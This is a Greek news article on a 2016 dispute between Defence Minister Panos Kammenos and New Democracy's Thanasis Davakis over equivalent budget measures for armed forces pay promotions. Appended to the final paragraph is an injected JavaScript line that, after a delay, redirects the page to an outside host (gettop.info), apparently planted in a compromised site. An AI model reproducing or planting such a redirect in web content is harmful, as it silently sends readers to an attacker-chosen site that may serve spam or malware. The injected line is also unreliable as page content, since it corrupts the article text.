Καμμένος: Ο κ. Δαβάκης παίζει πρωτοφανή μικροπολιτικά παιχνίδια

0
13

 

Έντονη ήταν η απάντηση του υπουργού Εθνικής Άμυνας Πάνου Καμμένου προς τον υπεύθυνο του Τομέα Αμυνας της Νέας Δημοκρατίας Θανάση Δαβάκη.

«Ο κ. Δαβάκης παίζει πρωτοφανή μικροπολιτικά παιχνίδια στην πλάτη των στελεχών των Ενόπλων Δυνάμεων, στους οποίους η συγκυβέρνηση Νέας Δημοκρατίας – ΠΑΣΟΚ, της οποίας ήταν μέλος, έκοψε το 35% των μισθών. Καταφεύγει σε ασύστολα ψεύδη, αναζητώντας απεγνωσμένα τρόπους να ασκήσει αντιπολίτευση», αναφέρει στην απάντησή του ο κ.Καμμένος.

Ο κ. Δαβάκης ανέφερε σε δήλωσή του πως παρήλθε η 30η Σεπτεμβρίου και το υπουργείο Εθνικής Άμυνας δεν έστειλε στο υπουργείο Οικονομικών τα χρηματικά ισοδύναμα για να μην ανασταλούν οι μισθολογικές προαγωγές των στελεχών των Ενόπλων Δυνάμεων.

«Τα ισοδύναμα μέτρα, τα οποία επικαλείται ο κ. Δαβάκης, εστάλησαν στο υπουργείο Οικονομικών στις 16 Σεπτεμβρίου 2016» ανέφερε ο κ. Καμμένος .

«Η Νέα Δημοκρατία απαιτεί από την κυβέρνηση και κυρίως από την πολιτική ηγεσία του υπουργείου Εθνικής Άμυνας να αντιμετωπίζει τα εν ενεργεία και εν αποστρατεία στελέχη των Ενόπλων Δυνάμεων με τον απαιτούμενο σεβασμό» ανέφερε ακόμη ο κ Δαβάκης και «όχι με ψεύδη και δήθεν άκαρπες προσπάθειες, προκειμένου ο κ. Καμμένος και το κόμμα του να αποκομίσουν μόνο επικοινωνιακά και ψηφοθηρικά οφέλη».

«Αν κάποιοι δεν σέβονται τις Ένοπλες Δυνάμεις είναι ο κ. Δαβάκης και το κόμμα του. Είναι άδικο και για τη Νέα Δημοκρατία να εκπροσωπείται από τον κ. Δαβάκη, που είτε δεν κατανοεί είτε παίζει το παιχνίδι του παραλόγου», καταλήγει η απάντηση του κ. Καμμένου.

«Θα τον παρακαλούσαμε να απαντήσει, όχι στη Νέα Δημοκρατία, αλλά στα στελέχη των Ενόπλων Δυνάμεων, στο εξής απλό ερώτημα: Τα ισοδύναμα που ισχυρίζεται ότι έστειλε στο υπουργείο Οικονομικών γιατί δεν έγιναν αποδεκτά; Διότι ήταν ανεπαρκή και αναξιόπιστα» απάντησε ο Θ.Δαβάκης στον Π,Καμμένο υπογραμμίζοντας πως «θα πρέπει επιτέλους να μάθει ότι οι Ένοπλες Δυνάμεις και τα στελέχη τους δικαιούνται μεγαλύτερη σοβαρότητα και αξιοπιστία από την πολιτική τους ηγεσία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here